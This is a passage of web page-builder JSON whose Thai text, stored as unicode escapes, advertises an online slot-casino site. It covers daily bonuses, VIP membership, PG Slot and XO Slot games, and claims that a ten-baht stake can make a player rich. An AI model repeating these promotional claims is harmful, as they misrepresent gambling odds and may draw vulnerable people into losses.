\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e17\\u0e38\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e23\\u0e31\\u0e1a\\u0e0b\\u0e49\\u0e33\\u0e44\\u0e14\\u0e49\\u0e17\\u0e38\\u0e01\\u0e27\\u0e31\\u0e19 \\u0e17\\u0e31\\u0e49\\u0e07\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e15\\u0e49\\u0e2d\\u0e19\\u0e23\\u0e31\\u0e1a \\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e1d\\u0e32\\u0e01\\u0e23\\u0e32\\u0e22\\u0e27\\u0e31\\u0e19 \\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e04\\u0e37\\u0e19\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e2a\\u0e35\\u0e22 \\u0e23\\u0e27\\u0e21\\u0e16\\u0e36\\u0e07\\u0e01\\u0e34\\u0e08\\u0e01\\u0e23\\u0e23\\u0e21\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e43\\u0e19\\u0e40\\u0e17\\u0e28\\u0e01\\u0e32\\u0e25\\u0e15\\u0e48\\u0e32\\u0e07 \\u0e46 \\u0e17\\u0e35\\u0e48\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21\\u0e02\\u0e2d\\u0e07\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e21\\u0e39\\u0e25\\u0e04\\u0e48\\u0e32\\u0e2a\\u0e39\\u0e07 \\u0e22\\u0e34\\u0e48\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e22\\u0e34\\u0e48\\u0e07\\u0e2a\\u0e30\\u0e2a\\u0e21\\u0e41\\u0e15\\u0e49\\u0e21\\u0e41\\u0e25\\u0e01\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e44\\u0e14\\u0e49\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e17\\u0e31\\u0e49\\u0e07\\u0e40\\u0e04\\u0e23\\u0e14\\u0e34\\u0e15\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e02\\u0e2d\\u0e07\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e1e\\u0e23\\u0e35\\u0e40\\u0e21\\u0e35\\u0e22\\u0e21\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e40\\u0e02\\u0e49\\u0e32\\u0e23\\u0e48\\u0e27\\u0e21\\u0e01\\u0e34\\u0e08\\u0e01\\u0e23\\u0e23\\u0e21\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19\\u0e40\\u0e23\\u0e35\\u0e22\\u0e01\\u0e44\\u0e14\\u0e49\\u0e27\\u0e48\\u0e32\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e40\\u0e25\\u0e48\\u0e19\\u0e02\\u0e2d\\u0e07\\u0e04\\u0e38\\u0e13\\u0e21\\u0e35\\u0e04\\u0e48\\u0e32\\u0e17\\u0e38\\u0e01\\u0e27\\u0e34\\u0e19\\u0e32\\u0e17\\u0e35<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ff86a53\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e14\\u0e39\\u0e41\\u0e25\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01\\u0e41\\u0e1a\\u0e1a VIP \\u0e17\\u0e35\\u0e21\\u0e07\\u0e32\\u0e19\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e40\\u0e2b\\u0e25\\u0e37\\u0e2d \\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e40\\u0e2b\\u0e27\\u0e35\\u0e48\\u0e22\\u0e07\\u0e41\\u0e19\\u0e48\\u0e19\\u0e2d\\u0e19 \",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"55e80bb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e41\\u0e19\\u0e48\\u0e19\\u0e2d\\u0e19\\u0e27\\u0e48\\u0e32\\u0e04\\u0e27\\u0e32\\u0e21\\u0e41\\u0e15\\u0e01\\u0e15\\u0e48\\u0e32\\u0e07\\u0e17\\u0e35\\u0e48\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e04\\u0e19\\u0e2d\\u0e32\\u0e08\\u0e44\\u0e21\\u0e48\\u0e23\\u0e39\\u0e49\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e21\\u0e35\\u0e21\\u0e32\\u0e15\\u0e23\\u0e10\\u0e32\\u0e19 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01 VIP \\u0e16\\u0e39\\u0e01\\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e32\\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e40\\u0e2b\\u0e19\\u0e37\\u0e2d\\u0e43\\u0e04\\u0e23 \\u0e22\\u0e34\\u0e48\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e21\\u0e32\\u0e01 \\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01\\u0e01\\u0e47\\u0e08\\u0e30\\u0e2a\\u0e39\\u0e07\\u0e02\\u0e36\\u0e49\\u0e19\\u0e15\\u0e32\\u0e21\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e2a\\u0e30\\u0e2a\\u0e21\\u0e04\\u0e30\\u0e41\\u0e19\\u0e19 \\u0e41\\u0e25\\u0e30\\u0e17\\u0e38\\u0e01\\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e08\\u0e30\\u0e44\\u0e14\\u0e49\\u0e23\\u0e31\\u0e1a\\u0e1a\\u0e23\\u0e34\\u0e01\\u0e32\\u0e23\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e15\\u0e31\\u0e27 \\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e40\\u0e08\\u0e49\\u0e32\\u0e2b\\u0e19\\u0e49\\u0e32\\u0e17\\u0e35\\u0e48\\u0e14\\u0e39\\u0e41\\u0e25\\u0e2a\\u0e48\\u0e27\\u0e19\\u0e15\\u0e31\\u0e27 \\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e23\\u0e32\\u0e22\\u0e40\\u0e14\\u0e37\\u0e2d\\u0e19 \\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e40\\u0e02\\u0e49\\u0e32\\u0e23\\u0e48\\u0e27\\u0e21\\u0e01\\u0e34\\u0e08\\u0e01\\u0e23\\u0e23\\u0e21\\u0e2a\\u0e38\\u0e14\\u0e40\\u0e2d\\u0e47\\u0e01\\u0e0b\\u0e4c\\u0e04\\u0e25\\u0e39\\u0e0b\\u0e35\\u0e1f\\u0e17\\u0e35\\u0e48\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01\\u0e17\\u0e31\\u0e48\\u0e27\\u0e44\\u0e1b\\u0e40\\u0e02\\u0e49\\u0e32\\u0e44\\u0e21\\u0e48\\u0e44\\u0e14\\u0e49 \\u0e2d\\u0e35\\u0e01\\u0e17\\u0e31\\u0e49\\u0e07\\u0e40\\u0e23\\u0e32\\u0e22\\u0e31\\u0e07\\u0e21\\u0e35\\u0e0a\\u0e48\\u0e2d\\u0e07\\u0e17\\u0e32\\u0e07\\u0e15\\u0e34\\u0e14\\u0e15\\u0e48\\u0e2d\\u0e17\\u0e35\\u0e48\\u0e2b\\u0e25\\u0e32\\u0e01\\u0e2b\\u0e25\\u0e32\\u0e22 \\u0e17\\u0e31\\u0e49\\u0e07\\u0e41\\u0e0a\\u0e17\\u0e2a\\u0e14\\u0e43\\u0e19\\u0e2b\\u0e19\\u0e49\\u0e32\\u0e40\\u0e27\\u0e47\\u0e1a Line Official \\u0e41\\u0e25\\u0e30\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e40\\u0e2b\\u0e25\\u0e37\\u0e2d\\u0e1c\\u0e48\\u0e32\\u0e19\\u0e41\\u0e2d\\u0e1b\\u0e1e\\u0e25\\u0e34\\u0e40\\u0e04\\u0e0a\\u0e31\\u0e19 \\u0e17\\u0e38\\u0e01\\u0e0a\\u0e48\\u0e2d\\u0e07\\u0e17\\u0e32\\u0e07\\u0e15\\u0e2d\\u0e1a\\u0e01\\u0e25\\u0e31\\u0e1a\\u0e44\\u0e27\\u0e20\\u0e32\\u0e22\\u0e43\\u0e19\\u0e44\\u0e21\\u0e48\\u0e01\\u0e35\\u0e48\\u0e19\\u0e32\\u0e17\\u0e35 \\u0e17\\u0e35\\u0e21\\u0e07\\u0e32\\u0e19\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e1b\\u0e23\\u0e30\\u0e08\\u0e33\\u0e15\\u0e25\\u0e2d\\u0e14 24 \\u0e0a\\u0e31\\u0e48\\u0e27\\u0e42\\u0e21\\u0e07 \\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e21\\u0e31\\u0e48\\u0e19\\u0e43\\u0e08\\u0e44\\u0e14\\u0e49\\u0e27\\u0e48\\u0e32\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e04\\u0e33\\u0e27\\u0e48\\u0e32\\u0e1b\\u0e25\\u0e48\\u0e2d\\u0e22\\u0e1b\\u0e31\\u0e0d\\u0e2b\\u0e32\\u0e17\\u0e34\\u0e49\\u0e07\\u0e44\\u0e27\\u0e49 \\u0e41\\u0e21\\u0e49\\u0e41\\u0e15\\u0e48\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e17\\u0e35\\u0e48\\u0e22\\u0e31\\u0e07\\u0e44\\u0e21\\u0e48\\u0e04\\u0e38\\u0e49\\u0e19\\u0e01\\u0e31\\u0e1a\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e01\\u0e47\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e31\\u0e07\\u0e27\\u0e25 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e17\\u0e35\\u0e21\\u0e07\\u0e32\\u0e19\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e41\\u0e19\\u0e30\\u0e19\\u0e33\\u0e17\\u0e38\\u0e01\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e2d\\u0e19 \\u0e15\\u0e31\\u0e49\\u0e07\\u0e41\\u0e15\\u0e48\\u0e01\\u0e32\\u0e23\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23 \\u0e01\\u0e32\\u0e23\\u0e1d\\u0e32\\u0e01\\u0e16\\u0e2d\\u0e19 \\u0e44\\u0e1b\\u0e08\\u0e19\\u0e16\\u0e36\\u0e07\\u0e01\\u0e32\\u0e23\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e2a\\u0e21\\u0e01\\u0e31\\u0e1a\\u0e07\\u0e1a\\u0e02\\u0e2d\\u0e07\\u0e04\\u0e38\\u0e13\\u0e17\\u0e38\\u0e01\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e43\\u0e2b\\u0e49\\u0e04\\u0e33\\u0e15\\u0e2d\\u0e1a\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e2d\\u0e32\\u0e0a\\u0e35\\u0e1e<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"2cd57df\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e2a\\u0e38\\u0e14\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29 3 \\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21\\u0e19\\u0e48\\u0e32\\u0e25\\u0e2d\\u0e07 \\u0e01\\u0e33\\u0e40\\u0e07\\u0e34\\u0e19\\u0e41\\u0e04\\u0e48\\u0e2a\\u0e34\\u0e1a\\u0e1a\\u0e32\\u0e17\\u0e01\\u0e47\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\n\\u0e25\\u0e38\\u0e49\\u0e19\\u0e23\\u0e27\\u0e22\\u0e44\\u0e14\\u0e49\\u0e40\\u0e25\\u0e22\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"49e7be0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e41\\u0e19\\u0e48\\u0e19\\u0e2d\\u0e19\\u0e27\\u0e48\\u0e32\\u0e01\\u0e32\\u0e23\\u0e2a\\u0e23\\u0e49\\u0e32\\u0e07\\u0e23\\u0e32\\u0e22\\u0e44\\u0e14\\u0e49\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e01\\u0e32\\u0e23\\u0e25\\u0e07\\u0e17\\u0e38\\u0e19\\u0e44\\u0e21\\u0e48\\u0e43\\u0e0a\\u0e48\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e22\\u0e32\\u0e01\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e17\\u0e35\\u0e48\\u0e04\\u0e34\\u0e14 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e32\\u0e21\\u0e35\\u0e1e\\u0e31\\u0e19\\u0e18\\u0e21\\u0e34\\u0e15\\u0e23\\u0e17\\u0e35\\u0e48\\u0e08\\u0e30\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e48\\u0e32\\u0e19\\u0e44\\u0e14\\u0e49\\u0e40\\u0e02\\u0e49\\u0e32\\u0e16\\u0e36\\u0e07\\u0e40\\u0e01\\u0e21\\u0e15\\u0e48\\u0e32\\u0e07 \\u0e46 \\u0e01\\u0e48\\u0e2d\\u0e19\\u0e43\\u0e04\\u0e23 \\u0e41\\u0e16\\u0e21\\u0e22\\u0e31\\u0e07\\u0e19\\u0e33\\u0e40\\u0e2a\\u0e19\\u0e2d\\u0e40\\u0e01\\u0e21\\u0e43\\u0e2b\\u0e21\\u0e48 \\u0e46 \\u0e17\\u0e35\\u0e48\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e19\\u0e38\\u0e01 \\u0e41\\u0e15\\u0e01\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e43\\u0e0a\\u0e49\\u0e40\\u0e07\\u0e34\\u0e19\\u0e25\\u0e07\\u0e17\\u0e38\\u0e19\\u0e2a\\u0e39\\u0e07\\u0e14\\u0e49\\u0e27\\u0e22 \\u0e42\\u0e14\\u0e22\\u0e21\\u0e35 3 \\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21\\u0e17\\u0e33\\u0e40\\u0e07\\u0e34\\u0e19\\u0e17\\u0e35\\u0e48\\u0e19\\u0e48\\u0e32\\u0e25\\u0e38\\u0e49\\u0e19\\u0e14\\u0e31\\u0e07\\u0e15\\u0e48\\u0e2d\\u0e44\\u0e1b\\u0e19\\u0e35\\u0e49 <\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ecb961\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d266248\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0ab58bb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3><span style=\\\"color: #960c0a;\\\"><b>PG Slot<\\/b><\\/span><\\/h3><p><span style=\\\"font-weight: 400;\\\">\\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e43\\u0e04\\u0e23 \\u0e46 \\u0e01\\u0e47\\u0e1e\\u0e39\\u0e14\\u0e16\\u0e36\\u0e07\\u0e43\\u0e19\\u0e27\\u0e07\\u0e01\\u0e32\\u0e23\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e04\\u0e32\\u0e2a\\u0e34\\u0e42\\u0e19\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e22\\u0e01\\u0e43\\u0e2b\\u0e49 pg Slot \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e02\\u0e36\\u0e49\\u0e19\\u0e0a\\u0e37\\u0e48\\u0e2d\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e20\\u0e32\\u0e1e\\u0e01\\u0e23\\u0e32\\u0e1f\\u0e34\\u0e01\\u0e2a\\u0e27\\u0e22 \\u0e40\\u0e1e\\u0e25\\u0e07\\u0e1b\\u0e23\\u0e30\\u0e01\\u0e2d\\u0e1a\\u0e40\\u0e23\\u0e49\\u0e32\\u0e43\\u0e08 \\u0e41\\u0e25\\u0e30\\u0e1f\\u0e35\\u0e40\\u0e08\\u0e2d\\u0e23\\u0e4c\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e17\\u0e35\\u0e48\\u0e44\\u0e21\\u0e48\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e43\\u0e04\\u0e23 \\u0e40\\u0e01\\u0e21\\u0e17\\u0e38\\u0e01\\u0e40\\u0e01\\u0e21\\u0e08\\u0e32\\u0e01\\u0e04\\u0e48\\u0e32\\u0e22\\u0e19\\u0e35\\u0e49\\u0e16\\u0e39\\u0e01\\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e41\\u0e15\\u0e48\\u0e21\\u0e35\\u0e23\\u0e32\\u0e22\\u0e25\\u0e30\\u0e40\\u0e2d\\u0e35\\u0e22\\u0e14\\u0e25\\u0e36\\u0e01\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e04\\u0e19\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e2d\\u0e1a\\u0e27\\u0e32\\u0e07\\u0e01\\u0e25\\u0e22\\u0e38\\u0e17\\u0e18\\u0e4c\\u0e43\\u0e19\\u0e01\\u0e32\\u0e23\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e02\\u0e2d\\u0e07 pg Slot \\u0e04\\u0e37\\u0e2d \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e25\\u0e37\\u0e48\\u0e19\\u0e44\\u0e2b\\u0e25\\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e17\\u0e38\\u0e01\\u0e2d\\u0e38\\u0e1b\\u0e01\\u0e23\\u0e13\\u0e4c \\u0e17\\u0e31\\u0e49\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e16\\u0e37\\u0e2d\\u0e41\\u0e25\\u0e30\\u0e04\\u0e2d\\u0e21\\u0e1e\\u0e34\\u0e27\\u0e40\\u0e15\\u0e2d\\u0e23\\u0e4c \\u0e42\\u0e14\\u0e22\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e14\\u0e32\\u0e27\\u0e19\\u0e4c\\u0e42\\u0e2b\\u0e25\\u0e14\\u0e41\\u0e2d\\u0e1b\\u0e1e\\u0e25\\u0e34\\u0e40\\u0e04\\u0e0a\\u0e31\\u0e19\\u0e43\\u0e2b\\u0e49\\u0e22\\u0e38\\u0e48\\u0e07\\u0e22\\u0e32\\u0e01 \\u0e19\\u0e2d\\u0e01\\u0e08\\u0e32\\u0e01\\u0e19\\u0e35\\u0e49\\u0e22\\u0e31\\u0e07\\u0e21\\u0e35\\u0e40\\u0e01\\u0e21\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e14\\u0e15\\u0e17\\u0e38\\u0e01\\u0e40\\u0e14\\u0e37\\u0e2d\\u0e19 \\u0e40\\u0e0a\\u0e48\\u0e19 Mahjong Ways, Lucky Neko, \\u0e2b\\u0e23\\u0e37\\u0e2d Treasures of Aztec \\u0e17\\u0e35\\u0e48\\u0e01\\u0e32\\u0e23\\u0e31\\u0e19\\u0e15\\u0e35\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2e\\u0e2d\\u0e15\\u0e17\\u0e38\\u0e01\\u0e07\\u0e27\\u0e14 \\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e41\\u0e15\\u0e01\\u0e2b\\u0e19\\u0e31\\u0e01\\u0e41\\u0e17\\u0e1a\\u0e17\\u0e38\\u0e01\\u0e2a\\u0e1b\\u0e34\\u0e19 \\u0e43\\u0e04\\u0e23\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e2d\\u0e1a\\u0e41\\u0e19\\u0e27\\u0e40\\u0e01\\u0e21\\u0e01\\u0e23\\u0e32\\u0e1f\\u0e34\\u0e01\\u0e41\\u0e1f\\u0e19\\u0e15\\u0e32\\u0e0b\\u0e35 \\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e2a\\u0e32\\u0e22\\u0e21\\u0e34\\u0e19\\u0e34\\u0e21\\u0e2d\\u0e25\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e1e\\u0e25\\u0e34\\u0e19 \\u0e46 \\u0e23\\u0e31\\u0e1a\\u0e23\\u0e2d\\u0e07\\u0e27\\u0e48\\u0e32 pg Slot \\u0e04\\u0e37\\u0e2d\\u0e04\\u0e33\\u0e15\\u0e2d\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e04\\u0e38\\u0e13\\u0e15\\u0e34\\u0e14\\u0e43\\u0e08\\u0e15\\u0e31\\u0e49\\u0e07\\u0e41\\u0e15\\u0e48\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e41\\u0e23\\u0e01\\u0e17\\u0e35\\u0e48\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e41\\u0e19\\u0e48\\u0e19\\u0e2d\\u0e19<\\/span><\\/p><h3><span style=\\\"color: #960c0a;\\\"><b>XO Slot<\\/b><\\/span><\\/h3><p><span style=\\\"font-weight: 400;\\\">\\u0e2d\\u0e35\\u0e01\\u0e2b\\u0e19\\u0e36\\u0e48\\u0e07\\u0e15\\u0e33\\u0e19\\u0e32\\u0e19\\u0e41\\u0e2b\\u0e48\\u0e07\\u0e27\\u0e07\\u0e01\\u0e32\\u0e23\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e17\\u0e35\\u0e48\\u0e04\\u0e2d\\u0e40\\u0e01\\u0e21\\u0e23\\u0e38\\u0e48\\u0e19\\u0e40\\u0e01\\u0e4b\\u0e32\\u0e22\\u0e31\\u0e07\\u0e1e\\u0e39\\u0e14\\u0e16\\u0e36\\u0e07\\u0e44\\u0e21\\u0e48\\u0e02\\u0e32\\u0e14\\u0e1b\\u0e32\\u0e01\\u0e01\\u0e47\\u0e04\\u0e37\\u0e2d XO Slot \\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e38\\u0e14\\u0e04\\u0e25\\u0e32\\u0e2a\\u0e2a\\u0e34\\u0e01\\u0e17\\u0e35\\u0e48\\u0e04\\u0e23\\u0e2d\\u0e07\\u0e43\\u0e08\\u0e19\\u0e31\\u0e01\\u0e40\\u0e14\\u0e34\\u0e21\\u0e1e\\u0e31\\u0e19\\u0e21\\u0e32\\u0e19\\u0e32\\u0e19 \\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e04\\u0e37\\u0e2d\\u0e40\\u0e25\\u0e48\\u0e19\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e40\\u0e02\\u0e49\\u0e32\\u0e1a\\u0e48\\u0e2d\\u0e22 \\u0e41\\u0e25\\u0e30\\u0e22\\u0e31\\u0e07\\u0e04\\u0e07\\u0e40\\u0e2a\\u0e19\\u0e48\\u0e2b\\u0e4c\\u0e02\\u0e2d\\u0e07\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e43\\u0e19\\u0e23\\u0e39\\u0e1b\\u0e41\\u0e1a\\u0e1a\\u0e14\\u0e31\\u0e49\\u0e07\\u0e40\\u0e14\\u0e34\\u0e21\\u0e44\\u0e27\\u0e49\\u0e04\\u0e23\\u0e1a\\u0e16\\u0e49\\u0e27\\u0e19 \\u0e40\\u0e01\\u0e21\\u0e02\\u0e2d\\u0e07 XO Slot \\u0e16\\u0e39\\u0e01\\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e32\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e17\\u0e31\\u0e49\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e41\\u0e25\\u0e30\\u0e21\\u0e37\\u0e2d\\u0e2d\\u0e32\\u0e0a\\u0e35\\u0e1e \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e43\\u0e0a\\u0e49\\u0e17\\u0e38\\u0e19\\u0e40\\u0e22\\u0e2d\\u0e30\\u0e01\\u0e47\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e25\\u0e38\\u0e49\\u0e19\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e43\\u0e2b\\u0e0d\\u0e48\\u0e44\\u0e14\\u0e49 \\u0e21\\u0e35\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e41\\u0e08\\u0e47\\u0e01\\u0e1e\\u0e2d\\u0e15\\u0e2a\\u0e38\\u0e48\\u0e21\\u0e17\\u0e35\\u0e48\\u0e41\\u0e15\\u0e01\\u0e1a\\u0e48\\u0e2d\\u0e22\\u0e08\\u0e19\\u0e16\\u0e39\\u0e01\\u0e40\\u0e23\\u0e35\\u0e22\\u0e01\\u0e27\\u0e48\\u0e32 \\u201c\\u0e04\\u0e48\\u0e32\\u0e22\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e2a\\u0e32\\u0e22\\u0e42\\u0e0a\\u0e04\\u201d \\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e40\\u0e01\\u0e21\\u0e2e\\u0e34\\u0e15\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07 Roma, Supreme Caishen \\u0e2b\\u0e23\\u0e37\\u0e2d Lucky Panda \\u0e17\\u0e38\\u0e01\\u0e40\\u0e01\\u0e21\\u0e21\\u0e35\\u0e40\\u0e2d\\u0e01\\u0e25\\u0e31\\u0e01\\u0e29\\u0e13\\u0e4c\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e15\\u0e31\\u0e27 \\u0e17\\u0e31\\u0e49\\u0e07\\u0e20\\u0e32\\u0e1e \\u0e40\\u0e2a\\u0e35\\u0e22\\u0e07 \\u0e41\\u0e25\\u0e30\\u0e2d\\u0e31\\u0e15\\u0e23\\u0e32\\u0e08\\u0e48\\u0e32\\u0e22\\u0e17\\u0e35\\u0e48\\u0e04\\u0e38\\u0e49\\u0e21\\u0e04\\u0e48\\u0e32 